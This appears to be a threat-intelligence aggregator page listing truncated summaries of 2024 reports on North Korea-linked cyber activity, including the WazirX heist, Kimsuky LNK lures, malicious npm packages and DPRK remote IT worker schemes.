654 reports
Blackwater International analyzed the July 2024 WazirX cyber heist, in which attackers stole more than $240 million from a multi-sig wallet used by the Indian cryptocurrency exchange. The source says the attackers exploited a discrepancy between the trans…
PolySwarm summarizes DevPopper activity in which threat actors use fake job interviews to target software developers and deliver a Python-based RAT. The infection chain begins when developers are asked to download and run GitHub-hosted code, leading an NP…
A Kimsuky linked archive used a highway construction invoice theme and hid an LNK file behind a BMP filename, "Do-yang Company 20240610 invoice cover.bmp.lnk". The shortcut runs hidden PowerShell, decodes a Base64 command, downloads a decoy BMP from Dropb…
TRM Labs reports that Argentine Federal Police arrested a Russian national accused of laundering illicit cryptocurrency through an Argentina-based operation. The DPRK-relevant finding is that the subject allegedly accepted proceeds from illicit actors inc…
A July 2024 software supply-chain roundup notes that North Korean threat actors published multiple malicious npm packages targeting developers, with activity reportedly continuing for about a year. Some of the npm packages mimicked trusted or popular pack…
Zscaler ThreatLabZ research tracks Kimsuky activity across government, diplomatic, defense, think-tank, NGO, journalist, defector, academic, cryptocurrency, and e-commerce targets in South Korea, Japan, the United States, and other regions. The slides des…
The Coinmonks report follows a suspected Lazarus-linked GitHub network centered on accounts connected to Devmaster929 and Warmice71. It describes fake developer and recruiter profiles that act as follower nodes, boost credibility for target personas, moni…
A Korean malware analysis links the integration.pdf.lnk sample to Konni, described in the source as a North Korea-linked intrusion group associated with Thallium/APT37 and possibly Kimsuky. The LNK masquerades as a PDF view action and invokes cmd.exe with…
S2W TALON analyzed an LNK malware case that used a tax-evasion explanation-material lure and downloaded additional files from a hardcoded attacker server. The downloaded payloads included a malicious AutoIt script and a legitimate AutoIt3 runtime, ultimat…
Nurilab analyzed a VBS RAT script assessed as a BabyShark payload from Kimsuky activity against South Korean university professors in July 2024. The infection path used spearphishing to Gmail and Daum accounts, fake Naver or university portal login pages …
Cisco Talos attributes MoonPeak activity to UAT-5394, a North Korea nexus cluster it tracks separately from Kimsuky because the overlap is not yet technically conclusive. The actor forked XenoRAT into the MoonPeak RAT and used staging, C2, payload hosting…
A malicious LNK file attributed in the excerpt to Kimsuky used a private policy-meeting lure about South Korea-China and North Korea-China security issues. The file masqueraded as a Hangul Word Processor document and launched hidden PowerShell that search…
Nisos uses the July 2024 case of a U.S. security awareness company hiring a North Korean hacker under a stolen identity to outline DPRK remote IT worker hiring risks. The scheme relies on fake personas and stolen U.S. identities to obtain remote software …
The insiders claimed to be US residents and were hired for remote IT positions, which granted them access they exploited to attempt data exfiltration, install malware and conduct other malicious activity. In April 2024, CrowdStrike Services responded to t…
KBS reports evidence that North Korean IT workers may have participated in developing South Korean mobile applications through outsourced development channels. The article describes leaked data from a developer system, indicators suggesting a North Korean…